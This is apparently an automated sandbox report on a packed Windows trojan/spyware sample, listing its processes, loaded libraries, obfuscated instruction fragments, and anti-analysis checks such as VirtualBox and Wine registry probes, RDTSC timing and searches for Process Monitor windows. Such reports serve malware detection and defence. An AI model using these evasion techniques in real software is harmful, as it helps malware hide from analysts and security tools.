Source: 0zBsv1tnt4.exe, 00000000.00000003.1746866682.0000000005F8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740661280.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744585438.0000000005F87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749142697.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747250816.0000000006089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe

Uses 32bit PE files

Source: 0zBsv1tnt4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0zBsv1tnt4.exe

Static PE information: Section: ZLIB complexity 0.9996425653594772

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/67@9/5

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_00982070 CoCreateInstance,

0_2_00982070

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0zBsv1tnt4.exe, 00000000.00000003.1512072127.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1536544821.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1537140056.0000000005B82000.00000004.00000800.00020000.00000000.sdmp, 0zBsv1tnt4.exe, 00000000.00000003.1511972385.0000000005B06000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 0zBsv1tnt4.exe	Virustotal: Detection: 52%
Source: 0zBsv1tnt4.exe	ReversingLabs: Detection: 57%

Source: 0zBsv1tnt4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 1RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

File read: C:\Users\user\Desktop\0zBsv1tnt4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0zBsv1tnt4.exe "C:\Users\user\Desktop\0zBsv1tnt4.exe"
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wkscli.dll	Jump to behavior

Source: Google Drive.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 0zBsv1tnt4.exe

Static file information: File size 2997760 > 1048576

Source: 0zBsv1tnt4.exe

Static PE information: Raw size of xkuacxgz is bigger than: 0x100000 < 0x2b2200

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0zBsv1tnt4.exe, 00000000.00000002.1877383452.0000000006512000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Unpacked PE file: 0.2.0zBsv1tnt4.exe.950000.0.unpack :EW;.rsrc :W;.idata :W;xkuacxgz:EW;pzmqirjh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;xkuacxgz:EW;pzmqirjh:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: 0zBsv1tnt4.exe

Static PE information: real checksum: 0x2e58ac should be: 0x2dfedd

PE file contains sections with non-standard names

Source: 0zBsv1tnt4.exe	Static PE information: section name:
Source: 0zBsv1tnt4.exe	Static PE information: section name: .rsrc
Source: 0zBsv1tnt4.exe	Static PE information: section name: .idata
Source: 0zBsv1tnt4.exe	Static PE information: section name: xkuacxgz
Source: 0zBsv1tnt4.exe	Static PE information: section name: pzmqirjh
Source: 0zBsv1tnt4.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00987069 push es; retf	0_2_00987074
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098C990 push eax; mov dword ptr [esp], 5C5D5E5Fh	0_2_0098C99E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009939A1 push es; ret	0_2_009939A2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096B324 push F3B90099h; retf	0_2_0096B32A

Source: 0zBsv1tnt4.exe

Static PE information: section name: entropy: 7.97845575818733

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B28E9D second address: B28EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC22D01ECC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B27F46 second address: B27F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282F2 second address: B282FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282FA second address: B282FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282FE second address: B28302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285B7 second address: B285BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285BB second address: B285C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285C9 second address: B285DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C445 second address: B2C4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 2F70E0A8h 0x0000000d and ch, FFFFFFC8h 0x00000010 mov edi, 2516EB77h 0x00000015 push 00000003h 0x00000017 call 00007FC22D01ECD1h 0x0000001c mov esi, dword ptr [ebp+122D3C3Eh] 0x00000022 pop ecx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007FC22D01ECC8h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f call 00007FC22D01ECD4h 0x00000044 mov ecx, 5B398ED9h 0x00000049 pop ecx 0x0000004a push 00000003h 0x0000004c jmp 00007FC22D01ECCAh 0x00000051 call 00007FC22D01ECC9h 0x00000056 push eax 0x00000057 push edx 0x00000058 jl 00007FC22D01ECCCh 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
